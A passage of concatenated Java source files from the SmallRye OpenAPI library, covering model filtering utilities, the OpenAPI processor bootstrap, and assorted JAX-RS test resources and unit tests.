*/
public static final OpenAPI applyFilter(OASFilter filter, OpenAPI model) {
filterComponents(filter, model.getComponents());
if (model.getPaths() != null) {
filter(filter,
model.getPaths().getPathItems(),
FilterUtil::filterPathItem,
filter::filterPathItem,
model.getPaths()::removePathItem);
}
filter(filter, model.getServers(), null, filter::filterServer, model::removeServer);
filter(filter, model.getTags(), null, filter::filterTag, model::removeTag);
filter.filterOpenAPI(model);
return model;
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterComponents(OASFilter filter, Components model) {
if (model != null) {
filter(filter, model.getCallbacks(), FilterUtil::filterCallback, filter::filterCallback, model::removeCallback);
filter(filter, model.getHeaders(), FilterUtil::filterHeader, filter::filterHeader, model::removeHeader);
filter(filter, model.getLinks(), FilterUtil::filterLink, filter::filterLink, model::removeLink);
filter(filter, model.getParameters(), FilterUtil::filterParameter, filter::filterParameter, model::removeParameter);
filter(filter, model.getRequestBodies(), FilterUtil::filterRequestBody, filter::filterRequestBody,
model::removeRequestBody);
filter(filter, model.getResponses(), FilterUtil::filterAPIResponse, filter::filterAPIResponse,
model::removeResponse);
filter(filter, model.getSchemas(), FilterUtil::filterSchema, filter::filterSchema, model::removeSchema);
filter(filter, model.getSecuritySchemes(), null, filter::filterSecurityScheme, model::removeSecurityScheme);
}
}
/**
* Filters the given models.
*
* @param filter OASFilter
* @param models map of models to be filtered
* @param contentFilter a filter method to be applied over the properties of each model
* @param modelFilter a filter method - reference to method of OASFilter
* @param remover
* reference to the containing model's method for removing models
*/
private static <K, V> void filter(OASFilter filter,
Map<K, V> models,
BiConsumer<OASFilter, V> contentFilter,
UnaryOperator<V> modelFilter,
Consumer<K> remover) {
if (models != null) {
// The collection must be copied since the original may be modified via the remover
for (Map.Entry<K, V> entry : new LinkedHashSet<>(models.entrySet())) {
V model = entry.getValue();
if (contentFilter != null) {
contentFilter.accept(filter, model);
}
if (modelFilter.apply(model) == null) {
remover.accept(entry.getKey());
}
}
}
}
/**
* Filters the given models.
*
* @param filter OASFilter
* @param models list of models to be filtered
* @param contentFilter a filter method to be applied over the properties of each model
* @param modelFilter a filter method - reference to method of OASFilter
* @param remover
* reference to the containing model's method for removing models
*/
private static <T> void filter(OASFilter filter,
List<T> models,
BiConsumer<OASFilter, T> contentFilter,
UnaryOperator<T> modelFilter,
Consumer<T> remover) {
if (models != null) {
// The collection must be copied since the original may be modified via the remover
for (T model : new ArrayList<>(models)) {
if (contentFilter != null) {
contentFilter.accept(filter, model);
}
if (modelFilter.apply(model) == null) {
remover.accept(model);
}
}
}
}
/**
* Filters a given model
*
* @param filter OASFilter
* @param models model to be filtered
* @param contentFilter a filter method to be applied over the properties the model
* @param modelFilter a filter method - reference to method of OASFilter
* @param mutator
* reference to the containing model's method for updating the model
*/
private static <T> void filter(OASFilter filter,
T model,
BiConsumer<OASFilter, T> contentFilter,
UnaryOperator<T> modelFilter,
Consumer<T> mutator) {
if (model != null) {
if (contentFilter != null) {
contentFilter.accept(filter, model);
}
mutator.accept(modelFilter.apply(model));
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterCallback(OASFilter filter, Callback model) {
if (model != null) {
Collection<String> keys = new ArrayList<>(model.getPathItems().keySet());
for (String key : keys) {
PathItem childModel = model.getPathItem(key);
filterPathItem(filter, childModel);
if (filter.filterPathItem(childModel) == null) {
model.removePathItem(key);
}
}
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterPathItem(OASFilter filter, PathItem model) {
if (model != null) {
filter(filter, model.getParameters(), FilterUtil::filterParameter, filter::filterParameter, model::removeParameter);
filterOperation(filter, model.getDELETE(), model::setDELETE);
filterOperation(filter, model.getGET(), model::setGET);
filterOperation(filter, model.getHEAD(), model::setHEAD);
filterOperation(filter, model.getOPTIONS(), model::setOPTIONS);
filterOperation(filter, model.getPATCH(), model::setPATCH);
filterOperation(filter, model.getPOST(), model::setPOST);
filterOperation(filter, model.getPUT(), model::setPUT);
filterOperation(filter, model.getTRACE(), model::setTRACE);
filter(filter, model.getServers(), null, filter::filterServer, model::removeServer);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterOperation(OASFilter filter, Operation model, Consumer<Operation> mutator) {
if (model != null) {
filter(filter, model.getCallbacks(), FilterUtil::filterCallback, filter::filterCallback, model::removeCallback);
filter(filter, model.getParameters(), FilterUtil::filterParameter, filter::filterParameter, model::removeParameter);
filter(filter, model.getRequestBody(), FilterUtil::filterRequestBody, filter::filterRequestBody,
model::setRequestBody);
if (model.getResponses() != null) {
APIResponses responses = model.getResponses();
filter(filter, responses.getAPIResponses(), FilterUtil::filterAPIResponse, filter::filterAPIResponse,
responses::removeAPIResponse);
}
filter(filter, model.getServers(), null, filter::filterServer, model::removeServer);
mutator.accept(filter.filterOperation(model));
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterHeader(OASFilter filter, Header model) {
if (model != null) {
filterContent(filter, model.getContent());
filter(filter, model.getSchema(), FilterUtil::filterSchema, filter::filterSchema, model::setSchema);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterContent(OASFilter filter, Content model) {
if (model != null && model.getMediaTypes() != null) {
Collection<String> keys = new ArrayList<>(model.getMediaTypes().keySet());
for (String key : keys) {
MediaType childModel = model.getMediaType(key);
filterMediaType(filter, childModel);
}
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterMediaType(OASFilter filter, MediaType model) {
if (model != null) {
filterEncoding(filter, model.getEncoding());
filter(filter, model.getSchema(), FilterUtil::filterSchema, filter::filterSchema, model::setSchema);
}
}
/**
* Filters the given models.
*
* @param filter
* @param models
*/
private static void filterEncoding(OASFilter filter, Map<String, Encoding> models) {
if (models != null) {
Collection<String> keys = new ArrayList<>(models.keySet());
for (String key : keys) {
Encoding model = models.get(key);
filterEncoding(filter, model);
}
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterEncoding(OASFilter filter, Encoding model) {
if (model != null) {
filter(filter, model.getHeaders(), FilterUtil::filterHeader, filter::filterHeader, model::removeHeader);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterLink(OASFilter filter, Link model) {
if (model != null && model.getServer() != null) {
model.setServer(filter.filterServer(model.getServer()));
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterParameter(OASFilter filter, Parameter model) {
if (model != null) {
filterContent(filter, model.getContent());
filter(filter, model.getSchema(), FilterUtil::filterSchema, filter::filterSchema, model::setSchema);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterRequestBody(OASFilter filter, RequestBody model) {
if (model != null) {
filterContent(filter, model.getContent());
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterAPIResponse(OASFilter filter, APIResponse model) {
if (model != null) {
filterContent(filter, model.getContent());
filter(filter, model.getHeaders(), FilterUtil::filterHeader, filter::filterHeader, model::removeHeader);
filter(filter, model.getLinks(), FilterUtil::filterLink, filter::filterLink, model::removeLink);
}
}
/**
* Filters the given model.
*
* @param filter
* @param model
*/
private static void filterSchema(OASFilter filter, Schema model) {
if (model != null) {
filter(filter, model.getAdditionalPropertiesSchema(), FilterUtil::filterSchema, filter::filterSchema,
model::setAdditionalPropertiesSchema);
filter(filter, model.getAllOf(), FilterUtil::filterSchema, filter::filterSchema, model::removeAllOf);
filter(filter, model.getAnyOf(), FilterUtil::filterSchema, filter::filterSchema, model::removeAnyOf);
filter(filter, model.getItems(), FilterUtil::filterSchema, filter::filterSchema, model::setItems);
filter(filter, model.getNot(), FilterUtil::filterSchema, filter::filterSchema, model::setNot);
filter(filter, model.getProperties(), FilterUtil::filterSchema, filter::filterSchema, model::removeProperty);
}
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/OpenApiProcessor.java<|end_filename|>
package io.smallrye.openapi.runtime;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.InvocationTargetException;
import java.util.ArrayList;
import java.util.List;
import org.eclipse.microprofile.config.Config;
import org.eclipse.microprofile.config.ConfigProvider;
import org.eclipse.microprofile.openapi.OASFilter;
import org.eclipse.microprofile.openapi.OASModelReader;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.IndexView;
import io.smallrye.openapi.api.OpenApiConfig;
import io.smallrye.openapi.api.OpenApiConfigImpl;
import io.smallrye.openapi.api.OpenApiDocument;
import io.smallrye.openapi.api.util.ClassLoaderUtil;
import io.smallrye.openapi.runtime.io.Format;
import io.smallrye.openapi.runtime.io.OpenApiParser;
import io.smallrye.openapi.runtime.scanner.OpenApiAnnotationScanner;
/**
* Provides some core archive processing functionality.
*
* @author <EMAIL>
*/
public class OpenApiProcessor {
private OpenApiProcessor() {
}
public static OpenAPI bootstrap(IndexView index) {
Config config = ConfigProvider.getConfig();
OpenApiConfig openApiConfig = OpenApiConfigImpl.fromConfig(config);
return bootstrap(openApiConfig, index);
}
public static OpenAPI bootstrap(OpenApiConfig config, IndexView index) {
ClassLoader defaultClassLoader = ClassLoaderUtil.getDefaultClassLoader();
return bootstrap(config, index, defaultClassLoader);
}
public static OpenAPI bootstrap(OpenApiConfig config, IndexView index, OpenApiStaticFile... staticFiles) {
ClassLoader defaultClassLoader = ClassLoaderUtil.getDefaultClassLoader();
return bootstrap(config, index, defaultClassLoader, staticFiles);
}
public static OpenAPI bootstrap(OpenApiConfig config, IndexView index, ClassLoader classLoader) {
List<OpenApiStaticFile> staticfiles = loadOpenApiStaticFiles(classLoader);
return bootstrap(config, index, classLoader, staticfiles.toArray(new OpenApiStaticFile[] {}));
}
public static OpenAPI bootstrap(OpenApiConfig config, IndexView index, ClassLoader classLoader,
OpenApiStaticFile... staticFiles) {
OpenApiDocument.INSTANCE.reset();
// Set the config
if (config != null) {
OpenApiDocument.INSTANCE.config(config);
}
// Load all static files
if (staticFiles != null && staticFiles.length > 0) {
for (OpenApiStaticFile staticFile : staticFiles) {
OpenApiDocument.INSTANCE.modelFromStaticFile(modelFromStaticFile(staticFile));
}
}
// Scan annotations
if (config != null && index != null) {
OpenApiDocument.INSTANCE.modelFromAnnotations(modelFromAnnotations(config, classLoader, index));
}
// Filter and model
if (config != null && classLoader != null) {
OpenApiDocument.INSTANCE.modelFromReader(modelFromReader(config, classLoader));
OpenApiDocument.INSTANCE.filter(getFilter(config, classLoader));
}
OpenApiDocument.INSTANCE.initialize();
OpenAPI openAPI = OpenApiDocument.INSTANCE.get();
OpenApiDocument.INSTANCE.reset();
return openAPI;
}
/**
* Parse the static file content and return the resulting model. Note that this
* method does NOT close the resources in the static file. The caller is
* responsible for that.
*
* @param staticFile OpenApiStaticFile to be parsed
* @return OpenApiImpl
*/
public static OpenAPI modelFromStaticFile(OpenApiStaticFile staticFile) {
if (staticFile == null) {
return null;
}
try {
return OpenApiParser.parse(staticFile.getContent(), staticFile.getFormat());
} catch (IOException e) {
throw new OpenApiRuntimeException(e);
}
}
/**
* Create an {@link OpenAPI} model by scanning the deployment for relevant JAX-RS and
* OpenAPI annotations. If scanning is disabled, this method returns null. If scanning
* is enabled but no relevant annotations are found, an empty OpenAPI model is returned.
*
* @param config OpenApiConfig
* @param index IndexView of Archive
* @return OpenAPIImpl generated from annotations
*/
public static OpenAPI modelFromAnnotations(OpenApiConfig config, IndexView index) {
return modelFromAnnotations(config, ClassLoaderUtil.getDefaultClassLoader(), index);
}
/**
* Create an {@link OpenAPI} model by scanning the deployment for relevant JAX-RS and
* OpenAPI annotations. If scanning is disabled, this method returns null. If scanning
* is enabled but no relevant annotations are found, an empty OpenAPI model is returned.
*
* @param config OpenApiConfig
* @param loader ClassLoader
* @param index IndexView of Archive
* @return OpenAPIImpl generated from annotations
*/
public static OpenAPI modelFromAnnotations(OpenApiConfig config, ClassLoader loader, IndexView index) {
if (config.scanDisable()) {
return null;
}
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, loader, index);
return scanner.scan();
}
/**
* Instantiate the configured {@link OASModelReader} and invoke it. If no reader is configured,
* then return null. If a class is configured but there is an error either instantiating or invoking
* it, a {@link OpenApiRuntimeException} is thrown.
*
* @param config OpenApiConfig
* @param loader ClassLoader
* @return OpenApiImpl created from OASModelReader
*/
public static OpenAPI modelFromReader(OpenApiConfig config, ClassLoader loader) {
String readerClassName = config.modelReader();
if (readerClassName == null) {
return null;
}
try {
Class<?> c = loader.loadClass(readerClassName);
OASModelReader reader = (OASModelReader) c.getDeclaredConstructor().newInstance();
return reader.buildModel();
} catch (ClassNotFoundException | InstantiationException | IllegalAccessException | IllegalArgumentException
| InvocationTargetException | NoSuchMethodException | SecurityException e) {
throw new OpenApiRuntimeException(e);
}
}
/**
* Instantiate the {@link OASFilter} configured by the app.
*
* @param config OpenApiConfig
* @param loader ClassLoader
* @return OASFilter instance retrieved from loader
*/
public static OASFilter getFilter(OpenApiConfig config, ClassLoader loader) {
String filterClassName = config.filter();
if (filterClassName == null) {
return null;
}
try {
Class<?> c = loader.loadClass(filterClassName);
return (OASFilter) c.getDeclaredConstructor().newInstance();
} catch (ClassNotFoundException | InstantiationException | IllegalAccessException | IllegalArgumentException
| InvocationTargetException | NoSuchMethodException | SecurityException e) {
throw new OpenApiRuntimeException(e);
}
}
private static List<OpenApiStaticFile> loadOpenApiStaticFiles(ClassLoader classLoader) {
List<OpenApiStaticFile> apiStaticFiles = new ArrayList<>();
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/META-INF/openapi.yaml", Format.YAML);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/WEB-INF/classes/META-INF/openapi.yaml", Format.YAML);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/META-INF/openapi.yml", Format.YAML);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/WEB-INF/classes/META-INF/openapi.yml", Format.YAML);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/META-INF/openapi.json", Format.JSON);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/WEB-INF/classes/META-INF/openapi.json", Format.JSON);
return apiStaticFiles;
}
private static List<OpenApiStaticFile> loadOpenApiStaticFile(List<OpenApiStaticFile> apiStaticFiles,
ClassLoader classLoader, String path, Format format) {
InputStream staticStream = classLoader.getResourceAsStream(path);
if (staticStream != null) {
apiStaticFiles.add(new OpenApiStaticFile(staticStream, format));
}
return apiStaticFiles;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Sub2TestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.PathParam;
@SuppressWarnings(value = "unused")
public class Sub2TestResource<T> {
@GET
@Path(value = "{subsubid}")
public T getSub2(@PathParam(value = "subsubid") String subsubid) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/JaxbJaxRsAnnotationScannerBasicTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.jboss.jandex.Indexer;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
/**
* Basic tests mostly to compare with Spring
*
* @author <NAME> (<EMAIL>)
*/
class JaxbJaxRsAnnotationScannerBasicTest extends JaxRsDataObjectScannerTestBase {
/**
* This test a basic, no OpenApi annotations, hello world GET service
*
* @throws IOException
* @throws JSONException
*/
@Test
void testJavaxBasicJaxRsGetDefinitionScanning() throws IOException, JSONException {
Indexer indexer = new Indexer();
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/JaxbGreetingGetResource.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/Greeting.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/JaxbGreeting.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/JaxbWithNameGreeting.class");
testBasicJaxRsGetDefinitionScanning(indexer.complete());
}
@Test
void testJakartaBasicJaxRsGetDefinitionScanning() throws IOException, JSONException {
Indexer indexer = new Indexer();
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/jakarta/JaxbGreetingGetResource.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/Greeting.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/jakarta/JaxbGreeting.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/jakarta/JaxbWithNameGreeting.class");
testBasicJaxRsGetDefinitionScanning(indexer.complete());
}
void testBasicJaxRsGetDefinitionScanning(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicJaxbJaxRsGetDefinitionScanning.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/resources/JaxbGreetingGetResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.resources;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import test.io.smallrye.openapi.runtime.scanner.entities.Greeting;
import test.io.smallrye.openapi.runtime.scanner.entities.JaxbGreeting;
import test.io.smallrye.openapi.runtime.scanner.entities.JaxbWithNameGreeting;
/**
* JAX-RS.
* Some basic tests, mostly to compare with the Spring implementation
*
* @author <NAME> (<EMAIL>)
*/
@Path("/greeting")
@Produces(MediaType.APPLICATION_XML)
@Consumes(MediaType.APPLICATION_XML)
public class JaxbGreetingGetResource {
@GET
@Path("/helloPathVariable1/{name}")
public Greeting helloPathVariable1(@PathParam("name") String name) {
return new Greeting("Hello " + name);
}
@GET
@Path("/helloPathVariable2/{name}")
public JaxbGreeting helloPathVariable2(@PathParam("name") String name) {
return new JaxbGreeting("Hello " + name);
}
@GET
@Path("/helloPathVariable3/{name}")
public JaxbWithNameGreeting helloPathVariable3(@PathParam("name") String name) {
return new JaxbWithNameGreeting("Hello " + name, "Title!", null);
}
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/runtime/scanner/ComponentOrderTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import static org.junit.jupiter.api.Assertions.assertArrayEquals;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.eclipse.microprofile.openapi.models.tags.Tag;
import org.jboss.jandex.Index;
import org.junit.jupiter.api.Test;
class ComponentOrderTest extends IndexScannerTestBase {
/*
* https://github.com/smallrye/smallrye-open-api/issues/735
*/
@Test
void testComponentsKeysSorted() throws Exception {
Index index = indexOf(Class.forName(getClass().getPackage().getName() + ".sorttest1.package-info"),
Class.forName(getClass().getPackage().getName() + ".sorttest2.package-info"));
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), index);
String[] expectedNames = { "123", "ABC", "DEF", "GHI", "KLM", "XYZ" };
OpenAPI result = scanner.scan();
printToConsole(result);
assertArrayEquals(expectedNames, result.getComponents().getCallbacks().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getExamples().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getHeaders().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getLinks().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getParameters().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getRequestBodies().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getResponses().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getSchemas().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getSecuritySchemes().keySet().toArray());
}
@Test
void testDefinitionTagOrderPreserved() throws Exception {
Index index = indexOf(Class.forName(getClass().getPackage().getName() + ".sorttest1.package-info"),
Class.forName(getClass().getPackage().getName() + ".sorttest2.package-info"));
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), index);
String[] expectedNames = { "DEF", "XYZ", "ABC" };
OpenAPI result = scanner.scan();
printToConsole(result);
assertArrayEquals(expectedNames, result.getTags().stream().map(Tag::getName).toArray());
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/ResteasyReactiveExceptionMapper.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.core.Response;
import jakarta.ws.rs.ext.ExceptionMapper;
// Mimic org.jboss.resteasy.reactive.server.spi.ResteasyReactiveExceptionMapper
public interface ResteasyReactiveExceptionMapper<E extends Throwable> extends ExceptionMapper<E> {
Response toResponse(E exception, Object context);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Message.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class Message {
private String message;
private String description;
public Message() {
}
public Message(String message) {
this.message = message;
}
public Message(String message, String description) {
this.message = message;
this.description = description;
}
public String getMessage() {
return message;
}
public String getDescription() {
return description;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/util/UtilLogging.java<|end_filename|>
package io.smallrye.openapi.api.util;
import org.jboss.logging.BasicLogger;
import org.jboss.logging.Logger;
import org.jboss.logging.annotations.Cause;
import org.jboss.logging.annotations.LogMessage;
import org.jboss.logging.annotations.Message;
import org.jboss.logging.annotations.MessageLogger;
@MessageLogger(projectCode = "SROAP", length = 5)
interface UtilLogging extends BasicLogger {
UtilLogging logger = Logger.getMessageLogger(UtilLogging.class, UtilLogging.class.getPackage().getName());
@LogMessage(level = Logger.Level.ERROR)
@Message(id = 1000, value = "Failed to introspect BeanInfo for: %s")
void failedToIntrospectBeanInfo(Class<?> clazz, @Cause Throwable cause);
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/SpecialCaseTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.jboss.jandex.Type;
import org.json.JSONException;
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.CsvSource;
import test.io.smallrye.openapi.runtime.scanner.entities.SpecialCaseTestContainer;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class SpecialCaseTests extends JaxRsDataObjectScannerTestBase {
@ParameterizedTest
@CsvSource({
"SimpleTerminalType, listOfString, special.simple.expected.json",
"DataObjectList, ccList, special.dataObjectList.expected.json",
"WildcardWithSuperBound, listSuperFlight, special.wildcardWithSuperBound.expected.json",
"WildcardWithExtendBound, listExtendsFoo, special.wildcardWithExtendBound.expected.json",
"Wildcard, listOfAnything, special.wildcard.expected.json"
})
void testCollection(String label, String field, String expectedResource) throws IOException, JSONException {
String name = SpecialCaseTestContainer.class.getName();
Type pType = getFieldFromKlazz(name, field).type();
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, pType);
Schema result = scanner.process();
printToConsole(name, result);
assertJsonEquals(name, expectedResource, result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/User.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.validation.constraints.Max;
import javax.validation.constraints.Positive;
public interface User {
@Positive
@Max(value = 9999)
Integer getId();
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/JaxbCustomPropertyOrder.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.xml.bind.annotation.XmlAttribute;
import jakarta.xml.bind.annotation.XmlElement;
import jakarta.xml.bind.annotation.XmlType;
@XmlType(propOrder = { "theName", "comment2ActuallyFirst", "comment", "name2" })
public class JaxbCustomPropertyOrder {
@XmlElement(name = "theName")
String name;
@XmlAttribute
String name2;
@XmlElement
String comment;
@XmlAttribute(name = "comment2ActuallyFirst")
String comment2;
public String getComment() {
return comment;
}
public String getName() {
return name;
}
public String getName2() {
return name2;
}
public String getComment2() {
return comment2;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Widget.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class Widget {
String id;
String name;
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/OneSidedProperties.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class OneSidedProperties extends OneSidedParent {
String prop1;
String prop2;
String prop3;
@Schema(hidden = true)
public String getProp1() {
return prop1;
}
public void setProp1(String prop1) {
this.prop1 = prop1;
}
public String getProp2() {
return prop2;
}
@Schema(hidden = true)
public void setProp2(String prop2) {
this.prop2 = prop2;
}
}
<|start_filename|>testsuite/extra/src/test/java/test/io/smallrye/openapi/tck/ExtraSuiteLogging.java<|end_filename|>
package test.io.smallrye.openapi.tck;
import org.jboss.logging.Logger;
import org.jboss.logging.annotations.LogMessage;
import org.jboss.logging.annotations.Message;
import org.jboss.logging.annotations.MessageLogger;
@MessageLogger(projectCode = "SROAP", length = 5)
interface ExtraSuiteLogging {
ExtraSuiteLogging log = Logger.getMessageLogger(ExtraSuiteLogging.class, ExtraSuiteLogging.class.getPackage().getName());
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 12000, value = "Indexing asset: %s from archive: %s")
void indexing(String archivePath, String archive);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Canine.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public interface Canine {
@Schema(name = "bark1", readOnly = true)
public String getBark();
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ExampleResource1.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.time.LocalDate;
import javax.ws.rs.Path;
@Path(value = "/hi")
public class ExampleResource1 extends GenericResource implements Greetable {
String from;
@Override
public void setFromName(String from) {
this.from = from;
}
LocalDate date;
@Override
public void setGreetingDate(LocalDate date) {
this.date = date;
}
@Override
public String greet(GreetingBean bean) {
return "hi " + bean.name + ", from: " + from + "; on date: " + date;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResponseGenerationSuppressedBySuppliedDefaultApiResourceTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
@Path(value = "pets")
public class ResponseGenerationSuppressedBySuppliedDefaultApiResourceTestResource {
@POST
@Consumes(value = MediaType.APPLICATION_JSON)
@Produces(value = MediaType.APPLICATION_JSON)
@APIResponse(responseCode = "200", content = {}, description = "Description 200")
@APIResponse(responseCode = "204", description = "Description 204")
@APIResponse(responseCode = "400", description = "Description 400")
public Pet createOrUpdatePet(Pet pet) {
return pet;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/Feline.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public interface Feline {
@Schema(name = "name", required = false, example = "Feline")
void setName(String name);
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/api/OpenApiConfigImplTest.java<|end_filename|>
package io.smallrye.openapi.api;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNull;
import org.eclipse.microprofile.config.Config;
import org.eclipse.microprofile.config.ConfigProvider;
import org.eclipse.microprofile.openapi.OASConfig;
import org.junit.jupiter.api.Test;
class OpenApiConfigImplTest {
private static final String TEST_PROPERTY = OASConfig.EXTENSIONS_PREFIX + "OpenApiConfigImplTest";
@Test
void testGetStringConfigValueMissingIsNull() {
System.clearProperty(TEST_PROPERTY);
Config config = ConfigProvider.getConfig();
OpenApiConfigImpl oaiConfig = new OpenApiConfigImpl(config);
assertNull(oaiConfig.getStringConfigValue(TEST_PROPERTY));
}
@Test
void testGetStringConfigValueBlankIsNull() {
System.setProperty(TEST_PROPERTY, "\t \n\r");
try {
Config config = ConfigProvider.getConfig();
OpenApiConfigImpl oaiConfig = new OpenApiConfigImpl(config);
// White-space only value is treated as absent value
assertNull(oaiConfig.getStringConfigValue(TEST_PROPERTY));
} finally {
System.clearProperty(TEST_PROPERTY);
}
}
@Test
void testGetStringConfigValuePresent() {
System.setProperty(TEST_PROPERTY, " VALUE \t");
try {
Config config = ConfigProvider.getConfig();
OpenApiConfigImpl oaiConfig = new OpenApiConfigImpl(config);
// Trim is only used to determine if the value is blank. Full value returned for app use
assertEquals(" VALUE \t", oaiConfig.getStringConfigValue(TEST_PROPERTY));
} finally {
System.clearProperty(TEST_PROPERTY);
}
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/constants/SecurityConstants.java<|end_filename|>
package io.smallrye.openapi.api.constants;
import java.util.Arrays;
import java.util.List;
import org.jboss.jandex.DotName;
/**
* Constants related to the Security annotations
*
* @author <NAME> (<EMAIL>)
* @author <NAME> (<EMAIL>)
*/
public class SecurityConstants {
public static final List<DotName> DECLARE_ROLES = Arrays.asList(
DotName.createSimple("javax.annotation.security.DeclareRoles"),
DotName.createSimple("jakarta.annotation.security.DeclareRoles"));
public static final List<DotName> ROLES_ALLOWED = Arrays.asList(
DotName.createSimple("javax.annotation.security.RolesAllowed"),
DotName.createSimple("jakarta.annotation.security.RolesAllowed"));
public static final List<DotName> PERMIT_ALL = Arrays.asList(
